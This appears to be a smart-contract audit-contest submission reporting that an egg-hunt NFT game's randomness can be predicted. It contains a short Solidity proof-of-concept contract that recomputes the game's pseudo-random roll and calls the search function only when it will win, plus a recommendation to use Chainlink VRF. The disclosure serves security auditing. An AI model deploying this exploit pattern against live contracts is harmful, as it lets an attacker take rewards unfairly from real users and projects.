Submission Details
Severity:
High-1 Can get egg %100 success with off-chain computation.
Summary
In protocol the randomness can be calculated off chain and invoke in right time to gain nft.
Vulnerability Details
// SPDX-License-Identifier: MIT
contract Hack{
EggHuntGame public game;
constructor(address _gameAddress) {
game = EggHuntGame(_gameAddress);
}
function hack() public{
// This is a hack to get the game contract to mint an egg for us.
// We are using the block prevrandao and block timestamp to generate a pseudo-random number.
// The game contract will use this number to determine if we find an egg.
// This code can be run off chain and just call for game.searchForEgg() to get the egg via this contract.
int eggCounter= game.eggCounter();
int eggFindThreshold= game.eggFindThreshold();
uint256 random = uint256(
keccak256(abi.encodePacked(block.timestamp, block.prevrandao, address(this), eggCounter))
) % 100;
if (random < eggFindThreshold) {
game.searchForEgg();
}
}
}
Impact
Can get egg %100 success with off-chain computation.
Tools Used
Manuel review.
Recommendations
Change the randomness value to chainlink vrf values.
Rewards breakdown
nSLOC
129This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.